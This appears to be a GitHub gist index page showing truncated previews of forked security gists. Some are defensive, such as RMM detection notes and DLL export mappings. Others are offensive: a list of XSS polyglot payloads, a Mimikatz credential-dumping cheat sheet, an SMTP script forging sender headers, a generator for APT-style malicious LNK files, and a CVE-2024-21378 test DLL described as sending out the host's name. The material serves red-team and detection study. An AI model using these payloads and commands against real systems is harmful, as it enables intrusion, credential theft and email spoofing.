@emdnaia
emdnaia / RMM-detection.md
Created February 4, 2024 10:17 — forked from brokensound77/RMM-detection.md
Detection Engineering: RMM analysis

Detecting RMM

The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.

  • if the software is not used in the environment
    • could it be legitimate use by a random employee?
    • is it an attacker BYOL?
    • even so, all occurrences could probably be considered suspicious
  • if it is used in the environment
    • is every use of it legitimate? Probably not
  • this also creates significant living off the land (LOL) opportunity
@emdnaia
emdnaia / find-forks.py
Created March 9, 2024 01:39 — forked from akumria/find-forks.py
A quick way to find all the forks of a particular github project. see: https://github.com/akumria/findforks for a version which works now
#!/usr/bin/env python
import os
import urllib2
import json
import subprocess
user=None
repo=None
@emdnaia
emdnaia / altitude.py
Created March 9, 2024 01:49 — forked from HackingLZ/altitude.py
altitude alert
import csv
import requests
import argparse
from bs4 import BeautifulSoup
from colorama import Fore, Style, init
init(autoreset=True)
known_security_vendors = [
'symantec', 'mcafee', 'trendmicro', 'kaspersky', 'bitdefender',
@emdnaia
emdnaia / test_dll.c
Created April 12, 2024 12:03 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@emdnaia
emdnaia / nicecurl.py
Created May 2, 2024 23:28 — forked from HackingLZ/nicecurl.py
NICECURL Lnk Gen
# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
import argparse
import random
import win32com.client
def insert_digit(word, digit):
    pos = random.randint(1, len(word) - 1)
    return word[:pos] + digit + word[pos:]
def generate_command(url, file_path):
@emdnaia
emdnaia / all_email_provider_domains.txt
Created June 3, 2024 21:04 — forked from ammarshah/all_email_provider_domains.txt
A list of all email provider domains (free, paid, blacklist etc). Some of these are probably not around anymore. I've combined a dozen lists from around the web. Current "major providers" should all be in here as of the date this is created.
0-mail.com
007addict.com
020.co.uk
027168.com
0815.ru
0815.su
0clickemail.com
0sg.net
0wnd.net
0wnd.org
@emdnaia
emdnaia / xss-polyglots.txt
Created August 18, 2024 06:36 — forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
javascript:`</template>\"///"//<
@emdnaia
emdnaia / function-mappings.csv
Created August 31, 2024 21:17 — forked from mez-0/function-mappings.csv
Common DLLs' exports mapped to descriptions and categories via an LLM
| title | description | category |
| --- | --- | --- |
| KERNEL32.DLL!TerminateJobObject | This function terminates all processes associated with a job, managing processes and threads. | Process and Thread Management |
| RPCRT4.DLL!NdrServerCall2 | Facilitates remote procedure calls (RPC) but is not user-invoked. | Network Operations |
| SHLWAPI.DLL!StrCSpnW | Searches a string for specific characters, providing their index. Involves string manipulation rather than file or network processes. | Memory Management |
| GDI32FULL.DLL!UpdateColors | Updates the client area of a device context by remapping current colors to the logical palette. | System Information and Control |
| RPCRT4.DLL!IUnknown_AddRef_Proxy | Implements the AddRef method for interface proxies, managing reference counting in COM. | Process and Thread Management |
| ADVAPI32.DLL!RegEnumKeyW | Enumerates subkeys of an open registry key, indicating direct registry manipulation. | Registry Operations |
| SECHOST.DLL!CredDeleteA | Deletes a credential from the user's credential set, modifying stored authentication data. | |
@emdnaia
emdnaia / smtp.py
Created September 27, 2024 03:08 — forked from w1lsec/smtp.py
from socket import *
mail_server = ("tantotesting.mail.protection.outlook.com", 25)
client_socket = socket(AF_INET, SOCK_STREAM)
helo = "helo tantomail.com"
mail_from = "mail from: <[email protected]>"
rcpt_to = "rcpt to: <[email protected]>"
mail = """from: \x1f <,><[email protected]>\r
sender: "James Bond" <[email protected]>\r
@emdnaia
emdnaia / Mimikatz-cheatsheet
Created October 20, 2024 01:43 — forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full